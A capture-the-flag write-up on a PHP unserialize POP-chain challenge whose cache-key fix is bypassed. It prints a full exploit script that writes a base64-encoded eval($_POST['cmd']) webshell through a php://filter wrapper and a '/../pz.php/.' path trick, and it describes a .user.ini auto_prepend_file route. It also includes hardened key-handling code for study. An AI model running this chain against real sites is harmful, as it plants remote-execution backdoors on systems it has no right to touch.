This problem is fairly similar to [EIS 2019] EzPOP (see the [EIS 2019] EzPOP WP), except for one modified piece of code.
Before the fix:

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }
After the fix:

    public function getCacheKey(string $name): string {
        // make the cache file name random
        $cache_filename = $this->options['prefix'] . uniqid() . $name;
        if (substr($cache_filename, -strlen('.php')) === '.php') {
            die('?');
        }
        return $cache_filename;
    }
The file name is made random, and the suffix is compared so that it cannot end in .php.

There are two solutions.

The first is to bypass the .php suffix check: when PHP processes the path, it recursively removes any `/.` present in it, so the file is still written successfully.

Using the earlier exp:
    <?php
    class A {
        protected $store;
        protected $key;
        protected $expire;

        public function __construct()
        {
            // path traversal plus a trailing "/." so the ".php" suffix check is bypassed
            $this->key = '/../pz.php/.';
        }

        public function start($tmp)
        {
            $this->store = $tmp;
        }
    }

    class B {
        public $options;
    }

    $a = new A();
    $b = new B();
    // the prefix is a php://filter wrapper that base64-decodes the data being written
    $b->options['prefix'] = "php://filter/write=convert.base64-decode/resource=uploads/";
    $b->options['expire'] = 11;
    $b->options['data_compress'] = false;
    $b->options['serialize'] = 'strval';
    $a->start($b);
    $object = array("path" => "PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg");
    $path = '111';
    $a->cache = array($path => $object);
    $a->complete = '2';
    echo urlencode(serialize($a));
    ?>
Note that path traversal is required here; otherwise the uploaded shell is renamed to a file name based on the current time. Like this:
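The patched getCacheKey() above still tests the raw string, which is why a trailing `/.` slips past it, and the prefix itself comes from unserialized data. As an added example (not code from the challenge or the original writeup), here is a stricter replacement that never lets user input reach the file path; it assumes PHP 8 and a cache directory fixed in server configuration, and the class name, directory and sample names are constructed for the demonstration.

```php
<?php
// Added example, not code from the challenge or the original writeup.
// Assumes PHP 8 and a cache directory fixed by configuration. The on-disk
// name is derived from a hash of the cache name, so attacker bytes never
// reach the path and no suffix check on the raw string is needed.
declare(strict_types=1);

final class SafeCacheKey
{
    // Only a plain token is accepted as a cache name: no "/", ".", "..", no wrappers.
    private const NAME_PATTERN = '/^[A-Za-z0-9_-]{1,64}$/';

    public function __construct(private string $cacheDir)
    {
        // The directory comes from configuration, never from unserialized options.
        if (str_contains($cacheDir, '://') || str_contains($cacheDir, '..')) {
            throw new InvalidArgumentException('cache directory must be a plain local path');
        }
    }

    public function getCacheKey(string $name): string
    {
        if (preg_match(self::NAME_PATTERN, $name) !== 1) {
            throw new InvalidArgumentException('invalid cache name');
        }
        // A hex digest with a fixed extension can never end in ".php", and a
        // trailing "/." is rejected by the pattern before any path handling.
        return rtrim($this->cacheDir, '/') . '/' . hash('sha256', $name) . '.cache';
    }
}

// Demonstration with the two names that appear in this writeup (constructed directory).
$keys = new SafeCacheKey('/var/www/runtime/cache');
echo $keys->getCacheKey('111'), PHP_EOL;            // accepted: plain token
try {
    $keys->getCacheKey('/../pz.php/.');              // rejected: traversal and "/."
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The chain still starts with unserialize() on attacker-controlled input, so the key validation is a second line of defence, not a substitute for keeping untrusted data out of unserialize().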
The second solution can be taken from master Moyu's writeup of the Buu red envelope problem. The method used there is .user.ini, which automatically loads a jpg that contains the shell.

Here is the explanation of .user.ini.

The general idea is this: we can upload a .user.ini file and, inside it, use auto_prepend_file to name our uploaded image as the file to prepend. Then we upload a jpg file as our shell, and after that we can visit our shell file. For the specific exp, see master Moyu's article.